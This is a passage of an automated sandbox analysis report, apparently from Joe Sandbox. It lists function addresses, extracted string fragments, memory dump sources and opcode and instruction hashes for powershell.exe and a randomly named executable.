Instruction ID: 6f13f54045fccb7d8354d688b54b2abb236d25b7bb10b01348cf0d612b40d112
Opcode Fuzzy Hash: 319473fe5c96bc5cb9e6a03b96dc8682f6355c09981547596492091c30ee0d79
Instruction Fuzzy Hash: F1319373D2DAC64FE39B973958650947F90FF52668B5A10FBC0888F1D3EB19680A9305

Analysis Process: powershell.exePID: 2316, Parent PID: 6780COMMON

Executed Functions

Function 00007FF848FE30E9 Relevance: .7, Instructions: 661COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3433766278.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59003030aaa41112120cc37cea18ffd36e777ae6d69cbec10a4f58f203e23ba2
Instruction ID: 513fd29dc5e58f1437b4a939f9c2174ba655e06a560540af054d8858aea39f2c
Opcode Fuzzy Hash: 59003030aaa41112120cc37cea18ffd36e777ae6d69cbec10a4f58f203e23ba2
Instruction Fuzzy Hash: F312C031E0EB8A4FE396A72C18596B17BE1EF96260F0901FBD44DC71D3DA1DAC068356

Function 00007FF848FE6605 Relevance: 6.7, Strings: 5, Instructions: 433COMMON

Download Yara Rule

Strings

(B#I, xrefs: 00007FF848FE6858
(B#I, xrefs: 00007FF848FE66ED
(B#I, xrefs: 00007FF848FE678C
(B#I, xrefs: 00007FF848FE67C3
(B#I, xrefs: 00007FF848FE6974

Memory Dump Source

Source File: 00000018.00000002.3433766278.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: (B#I$(B#I$(B#I$(B#I$(B#I
API String ID: 0-1620291718
Opcode ID: c1ef3210abace8370db6712f6d2bbb4b4891d712a3e0735d1015052de822ea18
Instruction ID: 6a1b291e288d345afe0a7e0e0697f5f4c412d3046eb47b25e0818a460f1fbc5f
Opcode Fuzzy Hash: c1ef3210abace8370db6712f6d2bbb4b4891d712a3e0735d1015052de822ea18
Instruction Fuzzy Hash: C1D12031D1EA8E5FEBA5EB2858545B5BBA0EF16350F1801FAD44DCB0D3EA1CA805C355

Function 00007FF848FE4370 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

p>#I, xrefs: 00007FF848FE43ED

Memory Dump Source

Source File: 00000018.00000002.3433766278.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: p>#I
API String ID: 0-3576117583
Opcode ID: 22451844f92913e054f667a9c1f669a020c382b91096e3816e4ee188ae035fd6
Instruction ID: a1502422c784787e22de41080f12c6edfe4f9a404c8cf6744595e9ce9f83c4d6
Opcode Fuzzy Hash: 22451844f92913e054f667a9c1f669a020c382b91096e3816e4ee188ae035fd6
Instruction Fuzzy Hash: DD411432E0DE894FE7A9EB2C68106B477E1EF64660F0801BEC54DC70D7EA1CAC118385

Function 00007FF848FE43BC Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

p>#I, xrefs: 00007FF848FE43ED

Memory Dump Source

Source File: 00000018.00000002.3433766278.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: p>#I
API String ID: 0-3576117583
Opcode ID: 6ca33de618e6f2fb6c32de96da95bb644efaf491a9960b09c7c79cedb5c2bce7
Instruction ID: bbad4e90a07c291e40aa369fe005c9c808fe1738c569c15b9b01fd581f700b18
Opcode Fuzzy Hash: 6ca33de618e6f2fb6c32de96da95bb644efaf491a9960b09c7c79cedb5c2bce7
Instruction Fuzzy Hash: F411C132E0EA854FE7A5EB2C98505B87BD1FF60660F5800BED41DC74D2DB1CAC508385

Function 00007FF848F1A74C Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3425079481.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ec680926346450808fda5f028d133c0ced806540fc155b0bc3f5a31e896c53
Instruction ID: 98d2453f36c798db301c9e219d01829d08b4c2e20e241c705cfebea578f2d899
Opcode Fuzzy Hash: 26ec680926346450808fda5f028d133c0ced806540fc155b0bc3f5a31e896c53
Instruction Fuzzy Hash: F471393190DB484FD748DB2CD885AB57BE0EF96324F1441BED489C72A3DA25A847CB51

Function 00007FF848FE3361 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3433766278.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4299f3209ba9112cdc0928125664d9c07c50419d2e8cc58b26ebb14dcf7eb4d8
Instruction ID: 164c23f5f4673fa8f391077ae0e24af1e4846f587686c19f8dfdf0b547d23107
Opcode Fuzzy Hash: 4299f3209ba9112cdc0928125664d9c07c50419d2e8cc58b26ebb14dcf7eb4d8
Instruction Fuzzy Hash: D051F331E1DB8A4FE3A6E72C18585317AD2EF957A0F0901BAC44DC76D3DE1DAC05835A

Function 00007FF848F19728 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3425079481.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b4e76564cb045c39195e8efd9ece2b9aa509a786bb901d2a115ef8d0623ff8
Instruction ID: 8e316223fd71c0f9e2794aa9d79f86c49406656f54c51e16542d2c2dab209b3c
Opcode Fuzzy Hash: 72b4e76564cb045c39195e8efd9ece2b9aa509a786bb901d2a115ef8d0623ff8
Instruction Fuzzy Hash: 27412731D0CB888FEB19AB6CA8066B97BE0FB55710F54416FD04883696DA24AC46C7C6

Function 00007FF848DFF360 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3414266796.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848dfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e374151b9c256e18773183eb7cbdd377f32dad0e302543ee9374e037bf84256
Instruction ID: 5297e754ac635b978f09822723890fcee04a807145f965132c8846d816b3a2c1
Opcode Fuzzy Hash: 2e374151b9c256e18773183eb7cbdd377f32dad0e302543ee9374e037bf84256
Instruction Fuzzy Hash: DC41283140EBC44FE75A9B28A845A523FF0EF57320F1501DFD488CB1A7DB25A84AC7A2

Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3425079481.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Function 00007FF848FE4143 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3433766278.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d376e2adc8ed732d8cf02bf39a00a4556a3cc37094e63495d5c72e38aeaf67c2
Instruction ID: f4989e61dbcfb2c3c284ba15285a87d0d0432530f44ee2a4d1c4e0b5f1984d23
Opcode Fuzzy Hash: d376e2adc8ed732d8cf02bf39a00a4556a3cc37094e63495d5c72e38aeaf67c2
Instruction Fuzzy Hash: F8F0F431A0D9448FD755EB1CA8004B477E0FF69360F1800BAD04DC70A3DA29AC418344

Function 00007FF848F19CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3425079481.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8189bca01d9cbfae4054be8bc405492882ff7137a649e5acf925b01677257558
Instruction ID: 5eb059ed6d9443675e2291c9f651cf90a7b5e64ba2f5f772542ad1c08717d1e8
Opcode Fuzzy Hash: 8189bca01d9cbfae4054be8bc405492882ff7137a649e5acf925b01677257558
Instruction Fuzzy Hash: C3F0B43180C6894FDB46EF2888595D57FA0EF26350F0402DBE458C70A2DB659858CBC2

Function 00007FF848FE41D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3433766278.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: bd13b7360621c8f1dc224687372ce8c208df969c6eec68ee8d726599daf62f98
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: B3E01A31B0C8088FDB69EB0CE0409B973E1FBA8361B1101BBD14EC75A1CB2AEC518B84

Non-executed Functions

Function 00007FF848F18BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

N_^J, xrefs: 00007FF848F18C7A
N_^<, xrefs: 00007FF848F18C2A
N_^I, xrefs: 00007FF848F18C72
N_^F, xrefs: 00007FF848F18C6A
N_^6, xrefs: 00007FF848F18BFA

Memory Dump Source

Source File: 00000018.00000002.3425079481.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID: N_^6$N_^<$N_^F$N_^I$N_^J
API String ID: 0-4116931533
Opcode ID: f59819eedf52225c3822087bd42172681da16dc5bb84e3aa389aa58727f5eaa3
Instruction ID: 58a37288408cec2b7841e32effd1dac45db3f07ecb65aa4a0ef07aed3610af80
Opcode Fuzzy Hash: f59819eedf52225c3822087bd42172681da16dc5bb84e3aa389aa58727f5eaa3
Instruction Fuzzy Hash: 1B21027771A426AFD30277EDBC105D97790EB942BAB4802B3D358CF503DA18608B87E9

Analysis Process: dLErkomWRcaRguaKAMtYMnt.exePID: 7064, Parent PID: 6780COMMON

Executed Functions

Function 00007FF848F25141 Relevance: 9.4, Strings: 7, Instructions: 624COMMON

Download Yara Rule

Strings

], xrefs: 00007FF848F25492
", xrefs: 00007FF848F25628
[, xrefs: 00007FF848F25451
-, xrefs: 00007FF848F25723
}, xrefs: 00007FF848F25222
", xrefs: 00007FF848F255E7
{, xrefs: 00007FF848F251E1

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: "$"$-$[$]${$}
API String ID: 0-2220975799
Opcode ID: c463f20aaba7b00d75fc6ff2d16ddef157d3d0325064625ff2ecf4e189a25bfb
Instruction ID: d3343e0f08bcc0a7ec8abfa4a3108a9137339acccedadd5f82b811fec61e26dd
Opcode Fuzzy Hash: c463f20aaba7b00d75fc6ff2d16ddef157d3d0325064625ff2ecf4e189a25bfb
Instruction Fuzzy Hash: 7C42E270D1966D8FDBA8DF28D8907E9B7B1FF58301F5041AAD00EA7281CB396A81CF40

Function 00007FF848F2BED0 Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f38fdfd89dc605ec395929dca4622ec597c30c472cce1799d966edf415eab302
Instruction ID: 11946ba4acbc2ce3547af475d32fbf6d408ff93edacad5a46c54eaefe14c4ce3
Opcode Fuzzy Hash: f38fdfd89dc605ec395929dca4622ec597c30c472cce1799d966edf415eab302
Instruction Fuzzy Hash: D7F1273061C64D8FE749EB18D849AB977E1FF86364F1441AAD04ECB192EB36EC42CB41

Function 00007FF848F20F8D Relevance: 15.4, Strings: 12, Instructions: 376COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F2344A
8XH, xrefs: 00007FF848F232DE
8XH, xrefs: 00007FF848F2334C
8XH, xrefs: 00007FF848F23294
8XH, xrefs: 00007FF848F23370
8XH, xrefs: 00007FF848F23302
8XH, xrefs: 00007FF848F233BA
8XH, xrefs: 00007FF848F23427
8XH, xrefs: 00007FF848F235A6
8XH, xrefs: 00007FF848F233DE
xMH, xrefs: 00007FF848F232BC
8XH, xrefs: 00007FF848F234FC

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$xMH
API String ID: 0-3127251284
Opcode ID: 0d611cd0b5f76a7c3863e1f3598b9612c3366d367fac912afc84d08e33bea528
Instruction ID: 5911d3298eab1fb2d7e4dfd5bad6de8b6a9f8e84ded526da9997bd58ea645fcf
Opcode Fuzzy Hash: 0d611cd0b5f76a7c3863e1f3598b9612c3366d367fac912afc84d08e33bea528
Instruction Fuzzy Hash: 69D15671D296599FEB98EB68D8657B8B7B1FF18340F0441B9D00DE3292CF396980CB15

Function 00007FF848F23239 Relevance: 14.1, Strings: 11, Instructions: 310COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F2344A
8XH, xrefs: 00007FF848F232DE
8XH, xrefs: 00007FF848F2334C
8XH, xrefs: 00007FF848F23294
8XH, xrefs: 00007FF848F23370
8XH, xrefs: 00007FF848F23302
8XH, xrefs: 00007FF848F233BA
8XH, xrefs: 00007FF848F23427
8XH, xrefs: 00007FF848F235A6
8XH, xrefs: 00007FF848F233DE
xMH, xrefs: 00007FF848F232BC

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$xMH
API String ID: 0-677258541
Opcode ID: 57d5f5d9c02313bf4df7c45b0d112a91c3c810835a1d2faaf4106dc9e6cdf79f
Instruction ID: 4a6d272f80f0aad1f31979cdd1290ff67af1876767622f91c1041b1b7942721c
Opcode Fuzzy Hash: 57d5f5d9c02313bf4df7c45b0d112a91c3c810835a1d2faaf4106dc9e6cdf79f
Instruction Fuzzy Hash: C3B14971D19A9A8FEB98EB28D8657B8B7A1FF54340F0401B9C00DE72D2CF396984CB05

Function 00007FF848F37ED3 Relevance: 3.0, Strings: 2, Instructions: 499COMMON

Download Yara Rule

Strings

VL_H, xrefs: 00007FF848F3CE70
8XH, xrefs: 00007FF848F386EB

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$VL_H
API String ID: 0-4255044734
Opcode ID: fdefb55d7b4e9ef49812d436be7f9a97f5c3adc0a76e7d05b13356b004061d58
Instruction ID: 1a4c6280d6020343b9ca9ecb200cdea688dc88ee5d693998a26c11943ed0ceb3
Opcode Fuzzy Hash: fdefb55d7b4e9ef49812d436be7f9a97f5c3adc0a76e7d05b13356b004061d58
Instruction Fuzzy Hash: 8BF1EC31D1DA8D8FDB85EB68D8556EABBB0FF59350F0001BBD008D7282EB39A845C791

Function 00007FF848F27C25 Relevance: 2.9, Strings: 2, Instructions: 371COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F27C4F
8XH, xrefs: 00007FF848F27CC9

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH
API String ID: 0-1389412388
Opcode ID: c7edd79d9bfdc1349e882b2e2d3ad14f50b1b9e3de9819d836e4fbbc78199a4e
Instruction ID: 075d97a1c9038f23a96131ec547290399348c773a73610999d4aea555c35feef
Opcode Fuzzy Hash: c7edd79d9bfdc1349e882b2e2d3ad14f50b1b9e3de9819d836e4fbbc78199a4e
Instruction Fuzzy Hash: 01D17970D1CA59CFEB99EB6894856BDBBB1FF55341F908179C009D32C2CB39A886CB44

Function 00007FF848F25000 Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F250D4
8XH, xrefs: 00007FF848F25018

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH
API String ID: 0-1389412388
Opcode ID: 0c3642d4b1ab014db1140ad92815442f6143c2f1d0d14da104bb70e9455e8c1d
Instruction ID: 7096f707fcd4ffec73f92ecdec0d5feef7808e3dd6b0be4e4715da6ff221652f
Opcode Fuzzy Hash: 0c3642d4b1ab014db1140ad92815442f6143c2f1d0d14da104bb70e9455e8c1d
Instruction Fuzzy Hash: D731A230D19659DFDB98EB68D894BA9B7B1FF59301F1040A9D00DE7296CB79A880CF00

Function 00007FF848F5B766 Relevance: 2.0, Strings: 1, Instructions: 724COMMON

Download Yara Rule

Strings

L, xrefs: 00007FF848F5BB2A

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: ef184521135763cbaf8c4bb031f84b3be2f82c1a8e40c2eb2d732c17a6165e98
Instruction ID: d6fd261bc8a11d56359a449afe1fd7bfe5f1094d2dd6b6395d4214347972dc3f
Opcode Fuzzy Hash: ef184521135763cbaf8c4bb031f84b3be2f82c1a8e40c2eb2d732c17a6165e98
Instruction Fuzzy Hash: 3232A23092DA4A8FEB68EF188855BA8B7E0FF54350F144179D84DC76C3DB38A946C785

Function 00007FF848F35C23 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

{h, xrefs: 00007FF848F35D9F

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: {h
API String ID: 0-1804852683
Opcode ID: c42d56295e901ac5478c2c8e64a6766e4e823f4aca851eff877afd25769f6ec4
Instruction ID: b18e086e93fe4bfce5870e87e0390cc7a4429542152a3b6050169923f60a3794
Opcode Fuzzy Hash: c42d56295e901ac5478c2c8e64a6766e4e823f4aca851eff877afd25769f6ec4
Instruction Fuzzy Hash: F9B1B27091D6468FEB59EF28C0916B477A1FF89350F5441BAD84ACB2C7CB38B882CB55

Function 00007FF848F205D8 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

X}H, xrefs: 00007FF848F21337

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: X}H
API String ID: 0-959446611
Opcode ID: 032bd4fbbaf53c1e8058a8995b8fa976fd63eb5464b8906741f991cdab3c36f5
Instruction ID: 3672d33632c61b2d58b4013fe22439e7d1ad7468b7ce71d0c7a9c864c8497958
Opcode Fuzzy Hash: 032bd4fbbaf53c1e8058a8995b8fa976fd63eb5464b8906741f991cdab3c36f5
Instruction Fuzzy Hash: 6481E031A0CA898FDB58EF6C98615B977E2FF99744F140179E44EC32C6DE35AC428788

Function 00007FF848F2129D Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

X}H, xrefs: 00007FF848F21337

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: X}H
API String ID: 0-959446611
Opcode ID: 011720d3a604e0678263ba9aee8144a1fbf793a668d34a18cb9d4b4844727219
Instruction ID: e7b820162d5bd2bde163e2825c7a3ae89e2c0d5ed5d16b1d37076f0935429c8e
Opcode Fuzzy Hash: 011720d3a604e0678263ba9aee8144a1fbf793a668d34a18cb9d4b4844727219
Instruction Fuzzy Hash: 4E51CF31A0CA898FDB48EF1888655BA77E2FB98344F14417ED44EC32C5DF35E8428789

Function 00007FF848F360B2 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

, xrefs: 00007FF848F36122

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e1da3e0ae24ff1ea3923f966e28085a290656356f1d2af878fdb8e92e9bb7acb
Instruction ID: 348ffbd55ac6eca05ed3746db5359fa09efb2473ee83d476f75317c149be0fed
Opcode Fuzzy Hash: e1da3e0ae24ff1ea3923f966e28085a290656356f1d2af878fdb8e92e9bb7acb
Instruction Fuzzy Hash: 7B513771E0C54A9FEB59EBA8D4656BDBBB1FF48344F1041BAC00AE72C6CB386905CB54

Function 00007FF848F2E348 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

, xrefs: 00007FF848F2E3C2

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 50b75a8a0a1748c34ea53c418a2da27e68e261f1079cf747c9f91f2d037ce75b
Instruction ID: 423ad370756f925b9e2e07627173cdbfa6b01a3dac55c915d73b1b8a4fe5aba0
Opcode Fuzzy Hash: 50b75a8a0a1748c34ea53c418a2da27e68e261f1079cf747c9f91f2d037ce75b
Instruction Fuzzy Hash: 0A517C31D0C50A9FEB59EB98E4545BDBBB1FF48340F2041BAC00AE72C6CB396905CB54

Function 00007FF848F21CA9 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

xmH, xrefs: 00007FF848F21D63

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: xmH
API String ID: 0-1583574247
Opcode ID: 63ae1b5eeb4c80e191332ee685c92a6112fec00539002b7c0cbd370f02c8d4a7
Instruction ID: c2e974c324ffd9a948e83aaf7ef8345312b6acbf8edc9d829883d3e811dd97b1
Opcode Fuzzy Hash: 63ae1b5eeb4c80e191332ee685c92a6112fec00539002b7c0cbd370f02c8d4a7
Instruction Fuzzy Hash: 5F416871D09A1DCFDB44EBA8D4946ECBBF1FF08301F4001AAD009E7292DB39A945CB54

Function 00007FF848F2CDB9 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

VM_L, xrefs: 00007FF848F2CE72

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: VM_L
API String ID: 0-4113161681
Opcode ID: b09968e7d397c539a58e050c065ca0940600f5451e2ecc470623f36958047df2
Instruction ID: 8d4adf0341841677817465d4635ff0701ad89ffaaa563268faa8a24400e5cdd9
Opcode Fuzzy Hash: b09968e7d397c539a58e050c065ca0940600f5451e2ecc470623f36958047df2
Instruction Fuzzy Hash: 56319E38E1CD1A8FE764EB18A4449BCB7E1FF48390F650176E00ED32D1EB2A68019799

Function 00007FF848F34B47 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

@M_^, xrefs: 00007FF848F34B8E

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: @M_^
API String ID: 0-1539846797
Opcode ID: 33064c9d3148151c65bea51e3868f106348a5e1877808acedc68f03ed0721f71
Instruction ID: 2110486b0130832b20da62a784c9acd808550973b34d3227a6f8c764f5bd3989
Opcode Fuzzy Hash: 33064c9d3148151c65bea51e3868f106348a5e1877808acedc68f03ed0721f71
Instruction Fuzzy Hash: 85216271A1C90AAFDB58FB58D4916A8B7A1FFA8390F004176D01DD72C2DF247C52C794

Function 00007FF848F204F2 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

?N_^, xrefs: 00007FF848F20501

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: ?N_^
API String ID: 0-1123592777
Opcode ID: 57ebd4376019f8d30ce355aca14636867dc567154c8fa82fbf32811c399952f1
Instruction ID: 2915c0209e62a5aa9b5530ed9e9ebc321797e2430a198d1801378d195792fa21
Opcode Fuzzy Hash: 57ebd4376019f8d30ce355aca14636867dc567154c8fa82fbf32811c399952f1
Instruction Fuzzy Hash: E101D232A0D69EDFC742FF6CA8911FA7BA0EF41355F04017BE04CC60C2EA29A455C7A9

Function 00007FF848F31ADC Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

, xrefs: 00007FF848F31B4C

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
